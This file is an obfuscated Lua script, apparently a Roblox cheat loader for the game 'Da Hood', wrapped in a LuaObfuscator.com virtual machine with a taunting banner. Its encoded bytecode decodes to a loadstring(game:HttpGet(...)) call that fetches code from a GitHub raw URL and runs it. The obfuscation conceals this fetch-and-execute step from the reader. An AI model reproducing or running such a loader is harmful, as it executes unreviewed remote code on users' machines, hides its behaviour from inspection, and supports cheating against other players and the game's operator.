--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Lucien
-- Protected from skids like you!

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==3) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v15=function(v23,v24,...)local v25=1;local v26;v23=v5(v4(v23,5),"..",function(v37)if (v2(v37,2)==79) then v26=v1(v4(v37,1,1));return "";else local v72=0;local v73;while true do if (v72==0) then v73=v3(v1(v37,16));if v26 then local v87=v6(v73,v26);v26=nil;return v87;else return v73;end break;end end end end);local function v27(v38,v39,v40)if v40 then local v74=0;local v75;while true do if (v74==(0 + 0)) then v75=(v38/((4 -2)^(v39-(2 -1))))%((926 -(653 + 271))^(((v40-1) -(v39-(2 -1))) + ((1731 -(618 + 165)) -(523 + (1262 -838)))));return v75-(v75%((376 + 185) -(248 + 312)));end end else local v76=(7 -5)^(v39-(1 -0));return (((v38%(v76 + v76))>=v76) and (1 + 0)) or (0 + 0);end end local function v28()local v45=v2(v23,v25,v25);v25=v25 + 1;return v45;end local function v29()local v46,v47=v2(v23,v25,v25 + 2);v25=v25 + 1 + 1;return (v47 * (1236 -980)) + v46;end local function v30()local v48=0 + 0;local v49;local v50;local v51;local v52;while true do if (v48==(1 -(0 -0))) then return (v52 * (37307976 -20530760)) + (v51 * (87530 -21994)) + (v50 * (1351 -(901 + 194))) + v49;end if (v48==(0 + 0)) then v49,v50,v51,v52=v2(v23,v25,v25 + (3 -0));v25=v25 + (128 -(19 + 105));v48=1 + 0;end end end local function v31()local v53=v30();local v54=v30();return (( -(2 + 0) * v27(v54,85 -53)) + (1 -0)) * ((9 -7)^(v27(v54,12 + 9,29 + (2 -0)) -((4053 -(706 + 877)) -(1020 + 427)))) * ((((v27(v54,3 -2,1 + 19) * (2^(42 -10))) + v53)/((1077 -(12 + 1063))^(1486 -(399 + 1035)))) + ((744 -(737 + 6)) -0));end local function v32(v41)local v55;if  not v41 then local v77=(0 -0) + 0;while true do if (v77==(0 -0)) then v41=v30();if (v41==(1441 -(1026 + 415))) then return "";end break;end end end v55=v4(v23,v25,(v25 + v41) -(1135 -(1050 + 84)));v25=v25 + v41;local v56={};for v70=1 + (0 -0), #v55 do v56[v70]=v3(v2(v4(v55,v70,v70)));end return v7(v56);end local v33=v30;local function v34(...)return {...},v12("#",...);end local function v35()local v57=0 -0;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;local v66;while true do if (v57==(1 + 0)) then v60=nil;v61=nil;v57=1078 -(898 + 178);end if (v57~=4) then else v66=nil;while true do if (v58==3) then local v84=0 + 0;while true do if ((37 -(32 + 5))==v84) then v65=nil;v66=nil;v84=1;end if (v84==(1309 -(562 + 746))) then v58=18 -14;break;end end end if ((1524 -(102 + 1422))==v58) then v59=1035 -(825 + 210);v60=nil;v58=3 -2;end if (v58==(4 -3)) then local v85=0;while true do if ((3 -2)~=v85) then else v58=2 + 0;break;end if (v85==0) then v61=nil;v62=nil;v85=1 -0;end end end if (v58==(1 + 3)) then while true do if (v59~=2) then else local v102=983 -(922 + 61);local v103;while true do if ((225 -(172 + 53))==v102) then v103=0 + 0;while true do if (v103==(4 -3)) then v59=2 + 1;break;end if (v103==(0 -0)) then v64=nil;v65=nil;v103=2 -1;end end break;end end end if (v59==0) then local v104=0 + 0;while true do if (v104==(3 -2)) then v59=1 + 0;break;end if (v104~=(1090 -(272 + 818))) then else v60=0 -0;v61=nil;v104=578 -(404 + 173);end end end if (v59==(871 -(94 + 776))) then local v105=0;while true do if (v105~=(0 -0)) then else v62=nil;v63=nil;v105=1 + 0;end if ((1 + 0)~=v105) then else v59=1470 -(254 + 1214);break;end end end if (v59~=(1556 -(400 + 1153))) then else v66=nil;while true do local v106=0;local v107;local v108;while true do if (v106~=1) then else while true do if (v107==(0 -0)) then v108=0 + 0;while true do if (v108~=(1 + 0)) then else if (v60==(0 + 0)) then local v131=0 -0;local v132;local v133;while true do if (v131==(0 -0)) then v132=0 + 0;v133=nil;v131=2 -1;end if (v131==1) then while true do if (v132==(0 + 0)) then v133=0 + 0;while true do if ((4 -2)~=v133) then else v60=1386 -(302 + 1083);break;end if (v133~=(239 -(63 + 175))) then else local v158=0 -0;local v159;while true do if (v158==(0 + 0)) then v159=0 + 0;while true do if (v159==(628 -(129 + 499))) then v63={};v64={v61,v62,nil,v63};v159=3 -2;end if (v159~=(801 -(738 + 62))) then else v133=2;break;end end break;end end end if (v133~=(0 + 0)) then else local v160=0 -0;while true do if (v160==(0 + 0)) then v61={};v62={};v160=1337 -(717 + 619);end if (v160==(1 -0)) then v133=1 + 0;break;end end end end break;end end break;end end end break;end if (v108~=(219 -(21 + 198))) then else if (v60==(2 + 0)) then local v134=0 + 0;while true do local v136=0;local v137;while true do if (v136==(0 -0)) then v137=0;while true do if (v137==(0 + 0)) then if ((0 + 0)==v134) then local v161=0;while true do if (v161==(1 + 0)) then v134=1550 -(433 + 1116);break;end if (v161==(194 -(138 + 56))) then local v170=0 + 0;while true do if (v170~=0) then else for v175=1319 -(959 + 359),v30() do local v176=0;local v177;local v178;local v179;while true do if ((0 -0)==v176) then v177=0;v178=nil;v176=1 + 0;end if (v176==(2 -1)) then v179=nil;while true do if (v177~=(0 + 0)) then else local v184=0;while true do if (v184==(325 -(100 + 224))) then v177=1 -0;break;end if (v184==(0 + 0)) then v178=0 + 0;v179=nil;v184=1 + 0;end end end if (1==v177) then while true do if (v178==(0 -0)) then v179=v28();if (v27(v179,1 + 0,1862 -(1680 + 181))~=(0 -0)) then else local v185=0;local v186;local v187;local v188;local v189;while true do if (v185==(1179 -(6 + 1171))) then while true do if (v186~=(9 -6)) then else if (v27(v188,1 + 2,5 -2)==(1484 -(777 + 706))) then v189[4]=v66[v189[4]];end v61[v175]=v189;break;end if (v186~=(1 -0)) then else local v193=0;while true do if (v193==(1811 -(1165 + 646))) then local v202=0;while true do if (v202==(2 -1)) then v193=798 -(638 + 159);break;end if ((0 + 0)~=v202) then else v189={v29(),v29(),nil,nil};if (v187==(0 + 0)) then local v204=0;local v205;local v206;while true do if ((0 -0)==v204) then v205=0 + 0;v206=nil;v204=1 -0;end if ((771 -(330 + 440))==v204) then while true do if (v205~=0) then else v206=0 + 0;while true do if ((0 -0)==v206) then v189[1466 -(714 + 749)]=v29();v189[4]=v29();break;end end break;end end break;end end elseif (v187==1) then v189[3]=v30();elseif (v187==(2 + 0)) then v189[8 -5]=v30() -((190 -(83 + 105))^(37 -21));elseif (v187==(3 + 0)) then local v209=0;local v210;while true do if (v209==(12 -(6 + 6))) then v210=1923 -(106 + 1817);while true do if (0~=v210) then else v189[3]=v30() -((1923 -(82 + 1839))^(2 + 14));v189[3 + 1]=v29();break;end end break;end end end v202=1 -0;end end end if (v193~=(261 -(218 + 42))) then else v186=5 -3;break;end end end if (v186==0) then local v194=0 -0;local v195;while true do if (v194==(0 -0)) then v195=0;while true do if ((1 + 0)==v195) then v186=3 -2;break;end if ((0 -0)~=v195) then else local v203=0 -0;while true do if ((803 -(508 + 295))~=v203) then else v187=v27(v179,1 + 1,178 -(23 + 152));v188=v27(v179,4,19 -13);v203=1 + 0;end if ((1030 -(825 + 204))==v203) then v195=1 + 0;break;end end end end break;end end end if (v186==2) then if (v27(v188,1,3 -2)==(2 -1)) then v189[2]=v66[v189[7 -5]];end if (v27(v188,7 -5,4 -2)==(1 + 0)) then v189[7 -4]=v66[v189[4 -1]];end v186=2 + 1;end end break;end if (v185~=1) then else local v190=0 + 0;while true do if (v190~=(1834 -(11 + 1822))) then else v185=2;break;end if (v190==(684 -(123 + 561))) then v188=nil;v189=nil;v190=1;end end end if (v185==0) then local v191=0;while true do if (v191==1) then v185=1 + 0;break;end if (v191==(106 -(85 + 21))) then v186=1812 -(1301 + 511);v187=nil;v191=1 + 0;end end end end end break;end end break;end end break;end end end for v180=1,v30() do v62[v180-(1 + 0)]=v35();end v170=1810 -(1295 + 514);end if ((753 -(344 + 408))~=v170) then else v161=1 + 0;break;end end end end end if ((2 -1)==v134) then local v162=0 + 0;local v163;while true do if (v162==(0 + 0)) then v163=0 + 0;while true do if (v163==(0 + 0)) then for v182=634 -(113 + 520),v30() do v63[v182]=v30();end return v64;end end break;end end end break;end end break;end end end end if (1==v60) then local v135=0 -0;while true do if (v135==1) then local v143=0 + 0;while true do if (v143==(2 -1)) then v135=3 -1;break;end if (0~=v143) then else local v151=0 -0;while true do if (v151==0) then for v165=3 -2,v65 do local v166=590 -(141 + 449);local v167;local v168;while true do if (v166==1) then if (v167==(1 + 0)) then v168=v28()~=(0 + 0);elseif (v167==(3 -1)) then v168=v31();elseif (v167==(2 + 1)) then v168=v32();end v66[v165]=v168;break;end if (v166~=(864 -(230 + 634))) then else local v172=1003 -(592 + 411);while true do if (v172~=(3 -2)) then else v166=1 -0;break;end if ((929 -(196 + 733))~=v172) then else v167=v28();v168=nil;v172=2 -1;end end end end end v64[1759 -(1521 + 235)]=v28();v151=1;end if (v151==(1254 -(872 + 381))) then v143=1265 -(849 + 415);break;end end end end end if ((0 + 0)~=v135) then else local v144=0;while true do if (v144~=(0 + 0)) then else v65=v30();v66={};v144=3 -2;end if ((2 -1)==v144) then v135=1 + 0;break;end end end if (v135==2) then v60=2 + 0;break;end end end v108=1 + 0;end end break;end end break;end if (v106~=(0 -0)) then else v107=0 -0;v108=nil;v106=1;end end end break;end end break;end if (v58~=(4 -2)) then else local v86=0 -0;while true do if ((1989 -(1349 + 639))==v86) then v58=3;break;end if (v86~=(0 + 0)) then else v63=nil;v64=nil;v86=1392 -(1206 + 185);end end end end break;end if (v57==0) then v58=0;v59=nil;v57=1592 -(726 + 865);end if (v57==(3 + 0)) then v64=nil;v65=nil;v57=11 -7;end if (v57==(2 + 0)) then v62=nil;v63=nil;v57=3;end end end local function v36(v42,v43,v44)local v67=v42[1];local v68=v42[2];local v69=v42[3];return function(...)local v78=0;local v79;local v80;local v81;local v82;local v83;while true do if (2==v78) then v83=nil;v83=function()local v88=v67;local v89=v68;local v90=v69;local v91=v34;local v92={};local v93={};local v94={};for v99=(0 -0) -0,v82 do if (((3591 -(21 + 369))>=1341) and (v99>=v90)) then v92[v99-v90]=v81[v99 + (458 -(54 + 403))];else v94[v99]=v81[v99 + 1];end end local v95=(v82-v90) + ((805 -(350 + 453)) -1);local v96;local v97;while true do local v100=(1298 -(277 + 167)) -(831 + 23);local v101;while true do if (((426 + 370)<=2147) and (v100==((556 -(330 + 226)) + (733 -(556 + 177))))) then v101=1992 -(598 + 543 + 851);while true do if (((526 + 542)>=421) and (v101==((208 -(140 + 67)) + 0))) then if (((139 + 1010)<=(4719 -2741)) and (v97<=2)) then if ((v97<=0) or ((3303 -(345 + 1185))>(2613 + 334 + 4))) then local v115=0;local v116;local v117;while true do if (((1007 -574)==433) and (v115==(0 -0))) then v116=0 + (871 -(528 + 343));v117=nil;v115=1 + 0;end if ((v115==(1 -0)) or (1413==(1482 -(84 + (1956 -(1135 + 604)))))) then while true do if ((v116==(0 + 0)) or (577>(185 + 2033))) then v117=v96[2];v94[v117]=v94[v117](v13(v94,v117 + 1 + 0,v80));break;end end break;end end elseif ((v97>(548 -(465 + 82))) or (176>=(1237 -768))) then local v118=1266 -(1194 + 72);local v119;local v120;while true do if (((6669 -(730 + 1180))>(4865 -1284)) and (v118==(1 + 0))) then v94[v119 + (3 -2)]=v120;v94[v119]=v120[v96[5 -1]];break;end if ((v118==(0 + 0)) or ((522 + 44)==(5467 -3446))) then local v141=357 -(207 + (905 -(246 + 509)));while true do if (((227 -160)<3694) and (v141==(3 -2))) then v118=2 -1;break;end if (((11336 -7761)<=(11360 -7048)) and ((316 -((893 -608) + 31))==v141)) then v119=v96[(3 -1) + (0 -0)];v120=v94[v96[3]];v141=1;end end end end else v94[v96[1855 -(1681 + 172)]]();end elseif (((12632 -8327)==(6301 -(933 + 471 + 592))) and (v97<=(374 -(232 + 138)))) then if ((v97==(10 -7)) or ((173 + 47)<(28 + 0 + 0))) then v94[v96[2 + 0]]=v96[43 -(4 + 36)];else v94[v96[2 + 0]]=v44[v96[900 -(363 + 534)]];end elseif ((v97>(19 -14)) or ((6 + 2631)<(2899 -1513))) then do return;end else local v125=0 + 0;local v126;local v127;local v128;local v129;local v130;while true do if ((v125==(0 -0)) or (2895>(11758 -8006))) then local v142=0;while true do if ((v142==(0 -0)) or ((3027 + 877)<=(10478 -6801))) then v126=833 -(105 + 728);v127=nil;v142=(358 -(185 + 171)) -1;end if ((4547>(1388 -(36 + 736))) and (v142==1)) then v125=3 -2;break;end end end if ((v125==(2 -0)) or ((3141 -(60 + 827))==((7178 -(1422 + 330)) -(296 + 464)))) then v130=nil;while true do if ((((3 -2) -0)==v126) or ((242 + 108)==(1782 + 707))) then local v149=0 + (0 -0);while true do if ((v149==(1 + 0)) or ((1258 -(1206 -(360 + 418)))>=(2229 + 2245))) then v126=2;break;end if (((75 -44)==31) and (v149==0)) then local v156=0 + 0;while true do if ((v156==(0 + 0)) or ((4794 -(113 + 687))==(505 + 175))) then v80=(v129 + v127) -(449 -(167 + 281));v130=0 -0;v156=2 -1;end if (((5004 -(220 + 25))>(533 -(53 + 22))) and (v156==(1 + 0))) then v149=1 + 0;break;end end end end end if (((268 + 2416)==2684) and (v126==(2 -0))) then for v152=v127,v80 do local v153=0 -0;local v154;local v155;while true do if (((3381 + 1419)==4800) and (v153==(0 + 0))) then v154=379 -(217 + 162);v155=nil;v153=1;end if ((v153==(1915 -((2570 -1657) + 1001))) or ((2872 -(333 + 1208))<(1818 -((207 -(81 + 7)) + 385)))) then while true do if (((5611 -(1229 + (1203 -670)))<=4003) and (v154==(0 + 0 + 0))) then v155=0 -0;while true do if ((v155==(0 + 0)) or (((15619 -(26 + 824)) -(13155 -(164 + 1555)))<=(2066 -(414 + 945 + 0)))) then v130=v130 + 1;v94[v152]=v128[v130];break;end end break;end end break;end end end break;end if ((v126==(0 -0)) or (((2153 -1315) -489)==(7493 -4881))) then local v150=0 -0;while true do if ((1==v150) or ((3910 -(630 + 756))<=1710)) then v126=1;break;end if (((0 + (1105 -(7 + 1098)))==v150) or ((642 -188)>3773)) then local v157=(247 -(128 + 119)) + 0;while true do if ((v157==(667 -(276 + 390))) or ((1635 -(232 + 808))>=3392)) then v150=1991 -(1310 + (1094 -(355 + 59)));break;end if (((0 -0)==v157) or (((12829 -(312 + 771)) -(3638 + 5032))==(4723 -2223))) then v127=v96[1724 -(994 + 728)];v128,v129=v91(v94[v127](v13(v94,v127 + (2 -1),v96[990 -(70 + 917)])));v157=683 -(354 + (1352 -1024));end end end end end end break;end if (((1522 -607)<(3065 -(124 + (2439 -(456 + 788))))) and (v125==(1 -0))) then v128=nil;v129=nil;v125=1681 -(1667 + 12);end end end v79=v79 + 1;break;end if ((3191<(4585 -(301 + 72 + 715))) and (v101==(0 + 0))) then v96=v88[v79];v97=v96[126 -(62 + 16 + 47)];v101=1;end end break;end end end end;v78=3;end if (v78==3) then A,B=v34(v11(v83));if  not A[1] then local v98=v42[4][v79] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end if (0==v78) then v79=1;v80= -1;v78=1;end if (v78==1) then v81={...};v82=v12("#",...) -1;v78=2;end end end;end return v36(v35(),{},v24)(...);end;v0=4;end if (v0==2) then v9=getfenv or function()return _ENV;end;v10=setmetatable;v11=pcall;v12=select;v0=3;end if (4==v0) then v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F696D61676974687562757365722O3233342F6461682O6F646C6F636B2F6D61696E2F6461682O6F646C636F6B00083O0012043O00013O001204000100023O002002000100010003001203000300044O0005000100039O0000022O00013O000100012O00063O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);break;end end end
